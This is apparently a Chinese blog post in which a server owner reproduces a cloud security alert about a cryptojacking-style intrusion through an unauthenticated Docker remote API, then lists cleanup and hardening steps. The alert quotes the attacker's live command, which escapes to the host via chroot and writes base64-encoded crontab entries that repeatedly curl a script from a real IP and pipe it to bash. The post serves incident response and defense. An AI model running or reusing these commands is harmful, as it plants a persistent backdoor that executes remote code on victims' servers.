可疑编码命令 可疑
发生时间:2024-12-06 23:04:56
IP:8.138.181.*** 172.30.154.***
告警形貌:检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
非常事件详情
数据来源: 进程启动触发检测
告警原因:该命令行存在高度可疑的编码特性。
用户名:root
命令行:chroot /mnt/ /bin/sh -c if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y --reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/crontab && echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/cron.d/zzh && echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d >>/etc/crontab
进程路径:/bin/busybox
进程ID:24609
父进程文件路径:/usr/bin/runc
父进程ID:24608
进程链:
-[847] /usr/bin/containerd
-[24580] /usr/bin/containerd-shim-runc-v2 -namespace moby -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a start
-[24588] /usr/bin/containerd-shim-runc-v2 -namespace moby -id 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a -address /run/containerd/containerd.sock
-[24598] runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v2.task/moby/95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/moby/95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a --pid-file /run/containerd/io.containerd.runtime.v2.task/moby/95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a/init.pid 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
-[24605] runc init
-[24608] runc init
-[24609] chroot /mnt/ /bin/sh -c if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y --reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/crontab && echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/cron.d/zzh && echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d >>/etc/crontab
容器名:tender_dewdney
容器ID:95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
镜像ID:alpine@sha256:21a3deaa0d32a8057914f36584b5288d2e5ecc984380bc0118285c70fa8c9300
镜像名:alpine:latest
容器hostname:95492a8692a0
容器视角进程路径:/proc/24609/root/bin/busybox
提示:该进程的命令行参数中存在编码,而且解码后的内容可疑
形貌:该进程的命令行参数中存在编码,而且解码后的内容可疑。攻击者在植入恶意代码时,有可能会先举行编码。
处置建议:
首先验证告警的准确性。根据告警中的IOC(例如命令行,文件路径、网络等)结合呆板上的非常行为或其他告警,判定告警是否为误报。如果是则忽略或加白该告警;如果不是则及时举行处置,制止恶意行为产生进一步的影响。
观察告警的产生根因。根据告警详情或其他告警的事件说明,还原呆板被入侵的原因,修复相关漏洞或清理相关后门,防止攻击者的二次入侵。
事件说明
检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
命令行
curl http://205.185.118.246/b2f628/cronb.sh
进程PID
24694
进程文件名
curl
父进程ID
24690
父进程路径
dash
父进程文件路径
/usr/bin/dash
进程链
-[777] /usr/sbin/cron -f -P
- -[24685] /usr/sbin/cron -f -P
- -[24690] /bin/sh -c curl http://205.185.118.246/b2f628/cronb.sh|bash
- 查察相关docker容器,举行docker stop和docker rm
docker stop 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
docker rm 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
- 删除相关image镜像
docker image rm alpine:latest
- 手动查抄并清理以下文件中的恶意代码,删除有关205.185.118.246的定时任务。
sudo nano /etc/crontab
sudo nano /etc/cron.d/zzh
- 打开防火墙并把ip加入黑名单:
sudo ufw status verbose如果返回 Status: inactive,说明防火墙未启用。
sudo ufw enable
sudo ufw deny from 205.185.118.246
- 关闭docker远程,之前是因为设置不了docker-compose才用,现在解决了所以也不用docker远程了,而且关闭云服务器相关端口入站规则。
- reboot重启服务器
- ps -aux看还有无相关的进程。
处理后临时没有发现相关进程就先不管了,有问题以后再看。
入侵原理类似该文章,采用docker远程api未授权访问逃逸,docker远程访问端口要掩护好。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
